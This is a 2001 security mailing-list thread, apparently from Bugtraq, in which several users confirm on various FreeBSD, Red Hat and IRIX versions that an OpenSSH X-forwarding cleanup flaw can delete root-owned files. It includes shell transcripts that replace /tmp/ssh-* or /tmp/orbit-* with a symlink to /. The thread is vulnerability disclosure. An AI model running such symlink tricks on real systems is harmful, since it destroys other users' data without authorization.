Re: SSH allows deletion of other users files...

[aleph1 () securityfocus com]

Tomas Ericsson <te () matematik su se>

The vulnerability works perfectly for me:                                                                               
                                        sshd version OpenSSH_2.3.0 green () FreeBSD org 20010321

# uname -a
FreeBSD myhost 4.3-RELEASE FreeBSD 4.3-RELEASE #0: Sun Apr 22 01:05:25 GMT 2001
root () jkh101 osd bsdi com:/usr/src/sys/compile/GENERIC  alpha

[root@myhost root]# echo "testing">/cookies
[root@myhost root]# ls -l /cookies
-rw-r--r--  1 root  wheel  8 Jun  5 01:48 /cookies
[root@myhost root]# ssh -l te myhost
[te@myhost te]# rm -rf /tmp/ssh-1i24iea5
[te@myhost te]# ln -s / /tmp/ssh-1i24iea5
[te@myhost te]# logout
[root@myhost root]# ls -l /cookies
ls: /cookies: No such file or directory


Shannon Lee <shannon () scatter com>

reproduced with OpenSSH_2.3.0p1 on redhat 6.2.


TE <te () linux nu>

This vulnerability works fine on both RedHat 7.1 & 7.0 with the latest
updated packages from RedHat installed.

RH71# uname -a
Linux host1 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
RH71# rpm -qa|grep openssh-server
openssh-server-2.5.2p2-5

RH70# uname -a 
Linux host2 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
RH70# rpm -qa|grep openssh-server
openssh-server-2.5.2p2-1.7.2 


"David Thiel" <dthiel () nexprise com>

I tested this on 4.3-RELEASE, and was successful.
SSH Version OpenSSH_2.3.0 green () FreeBSD org 20010321


KF <dotslash () snosoft com>

Works on my box

[root@bounce dotslash]# cat /etc/redhat-release
Red Hat Linux release 7.0 (Guinness)
root@bounce dotslash]# ssh -V
SSH Version OpenSSH_2.1.1, protocol versions 1.5/2.0.
Compiled with SSL (0x0090581f).


Jan-Frode Myklebust <janfrode () parallab uib no>

I just tested with OpenSSH_2.5.2p2 on RedHat 7.0,
and OpenSSH_2.9p1 on IRIX 6.5 and both are
vulnerable to this. I used protocol version 2 on
both machines.


Luciano Miguel Ferreira Rocha <strange () nsk yi org>

Confirmied on RedHat 7.0 w/ OpenSSH 2.5.2p1. It needs, of course, to have
X forwarding activated.


"Golden_Eternity" <bhodi () bigfoot com>

I tried to reproduce this on a system running ssh 2.4.0, but I was unable to
locate the /tmp/ssh-* directory.

What version of ssh were you using when you discovered this?

[test@shiva test]$ ssh test@localhost
warning: Need basic cursor movement capablity, using vt100
test's password:
Authentication successful.
Last login: Mon Jun 04 2001 10:42:08 -0700
No mail.
[test@shiva test]$ ls -l /tmp/
total 12
drwxr-xr-x    2 root     root        12288 Apr  8 11:59 lost+found
[test@shiva test]$


"Schlosser, Matt D." <mschlosser () eschelon com

On the contrary, it just takes another form:

[root@bob /root]# touch /cookies;ls /cookies
/cookies
[root@bob /root]# ssh zen@localhost
zen@localhost's password:
[zen@bob zen]$ rm -r /tmp/orbit-zen/; ln -s / /tmp/orbit-zen
[zen@bob zen]$ logout
Connection to localhost closed.
[root@bob /root]# ls /cookies
/bin/ls: /cookies: No such file or directory

-- 
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum